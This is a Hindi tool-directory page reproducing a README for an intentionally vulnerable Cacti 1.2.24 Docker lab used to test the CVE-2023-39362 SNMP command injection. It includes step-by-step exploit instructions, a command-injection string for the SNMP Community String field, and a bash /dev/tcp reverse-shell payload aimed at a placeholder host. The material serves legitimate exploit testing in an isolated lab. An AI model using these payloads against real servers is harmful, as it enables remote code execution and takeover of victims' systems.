Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cacti-rce-snmp-options-vulnerable-application — चेतावनी: यह Cacti कमांड इंजेक्शन (CVE-2023-39362) के एक्सप्लॉइट का परीक्षण करने के लिए एक कमजोर एप्लिकेशन है। इसे अपने जोखिम पर चलाएँ! | Kitploit
उपकरण/GitHubGitHub/m3ssap0/cacti-rce-snmp-options-vulnerable-application
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणकमांड एंड कंट्रोललर्निंग और शिक्षालैब और अभ्यास
GitHubm3ssap0/cacti-rce-snmp-options-vulnerable-application

cacti-rce-snmp-options-vulnerable-application

चेतावनी: यह Cacti कमांड इंजेक्शन (CVE-2023-39362) के एक्सप्लॉइट का परीक्षण करने के लिए एक कमजोर एप्लिकेशन है। इसे अपने जोखिम पर चलाएँ!

रिपॉजिटरी देखेंवेबसाइट
21 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Cacti v1.2.24 प्रमाणित कमांड इंजेक्शन (CVE-2023-39362) संवेदनशील एप्लिकेशन

यह Cacti भेद्यता (CVE-2023-39362) के लिए एक्सप्लॉइट का परीक्षण करने हेतु एक संवेदनशील एप्लिकेशन है।

चेतावनी!

इस एप्लिकेशन में गंभीर सुरक्षा भेद्यताएं हैं। इसे अपने जोखिम पर चलाएं! अनुशंसा की जाती है कि एक बैकअप और सुरक्षित वातावरण (जैसे हालिया स्नैपशॉट और होस्ट-ओनली नेटवर्किंग वाला VM) उपयोग करें। इस एप्लिकेशन को किसी भी इंटरनेट-सामना करने वाले सर्वर पर अपलोड न करें, क्योंकि वे समझौता कर लिए जाएंगे।

अस्वीकरण: मैं इस बात की ज़िम्मेदारी नहीं लेता कि कोई भी इस एप्लिकेशन का उपयोग किस प्रकार करता है। इस एप्लिकेशन का एकमात्र उद्देश्य CVE-2023-39362 एक्सप्लॉइट के लिए एक परीक्षण परिदृश्य होना है और इसका दुर्भावनापूर्ण उपयोग नहीं किया जाना चाहिए। यदि इस एप्लिकेशन की स्थापना के माध्यम से आपका सर्वर समझौता किया जाता है, तो यह मेरी ज़िम्मेदारी नहीं है, यह उन व्यक्ति(ों) की ज़िम्मेदारी है जिन्होंने इसे अपलोड और इंस्टॉल किया।

भेद्यता जानकारी

  • CVE-ID: CVE-2023-39362
  • लिंक: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39362
  • विवरण: Cacti 1.2.24 में, कुछ शर्तों के तहत, एक प्रमाणित विशेषाधिकार प्राप्त उपयोगकर्ता, किसी Device के SNMP विकल्पों में एक दुर्भावनापूर्ण स्ट्रिंग का उपयोग कर सकता है, जिससे कमांड इंजेक्शन होता है और अंतर्निहित सर्वर पर रिमोट कोड निष्पादन प्राप्त होता है।

उपयोग

वातावरण सेटअप करने के चरण यहां दिए गए हैं:

  1. कंपोज़िशन शुरू करने के लिए docker compose up -d लॉन्च करें।
  2. आप http://127.0.0.1/cacti पर ब्राउज़ करके Cacti आरंभीकरण विज़ार्ड शुरू करके चरणों को पूरा कर सकते हैं। यदि आपको डेटाबेस के संदर्भ में कोई त्रुटि मिलती है, तो थोड़ी देर प्रतीक्षा करें और पृष्ठ को रीफ़्रेश करें।
  3. डिफ़ॉल्ट क्रेडेंशियल admin/admin हैं।
  4. विज़ार्ड के दौरान सभी बटनों पर "Next" दबाएं, तदनुसार विकल्प चुनें। सभी डिफ़ॉल्ट ठीक होने चाहिए और सभी अनिवार्य पूर्वापेक्षाएँ पूरी होनी चाहिए।
  5. स्थापना के बाद, admin के रूप में लॉगिन करें।
  6. "Console" > "Configuration" > "User" पर जाएं।
  7. guest उपयोगकर्ता पर क्लिक करें।
  8. इसे "Enable" करें, एक पासवर्ड सेट करें, यदि आप चाहें तो "Must Change Password at Next Login" अक्षम करें।
  9. "Save" बटन पर क्लिक करें।
  10. "Permissions" अनुभाग पर जाएं।
  11. "General Administration" के अंतर्गत, "Console Access" और "Sites/Devices/Data" सक्षम करें।
  12. "Save" बटन पर क्लिक करें।
  13. लॉगआउट करें और एक्सप्लॉइट आज़माने के लिए guest के रूप में फिर से लॉगिन करें।

कंटेनर का नाम vuln-cacti होगा।

परीक्षण SNMP डिवाइस के लिए होस्टनाम monitored_snmp_device है।

वातावरण को teardown करने के लिए docker compose down कमांड का उपयोग करें।

Cacti की आधिकारिक स्थापना मार्गदर्शिका यहां पाई जा सकती है।

मूल कारण

भेद्यता का विस्तृत मूल कारण मूल सुरक्षा सलाह या मेरे ब्लॉग पोस्ट में उपलब्ध है।

एक्सप्लॉइट

(यह केवल एक संभावित एक्सप्लॉइट है)

  1. "Console" > "Create" > "New Device" पर जाएं।
  2. एक Device बनाएं जो SNMP संस्करण 1 या 2 का समर्थन करता हो।
  3. सुनिश्चित करें कि Device में निम्न में से एक या अधिक टेम्पलेट वाले Graphs हैं:
    • "Net-SNMP - Combined SCSI Disk Bytes"
    • "Net-SNMP - Combined SCSI Disk I/O"
    • (टेम्पलेट "Net-SNMP Device" से Device बनाने से Graphs की पूर्वापेक्षा पूरी हो जाएगी)
  4. "SNMP Options" में, "SNMP Community String" फ़ील्ड के लिए, इस तरह का मान उपयोग करें: public\' ; touch /tmp/m3ssap0 ; \'.
  5. "Create" बटन पर क्लिक करें।
  6. /tmp के अंतर्गत बनाई गई फ़ाइल की उपस्थिति की जांच करें।

रिवर्स शेल प्राप्त करने के लिए, निम्न जैसा पेलोड उपयोग किया जा सकता है।

root@kitploit:~
public\' ; bash -c "exec bash -i &>/dev/tcp/<host>/<port> <&1" ; \'

लेखक

  • Antonio Francesco Sardella - भेद्यता रिपोर्टर - m3ssap0

लाइसेंस

यह प्रोजेक्ट Unlicense के तहत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें।

टूल डाउनलोड करें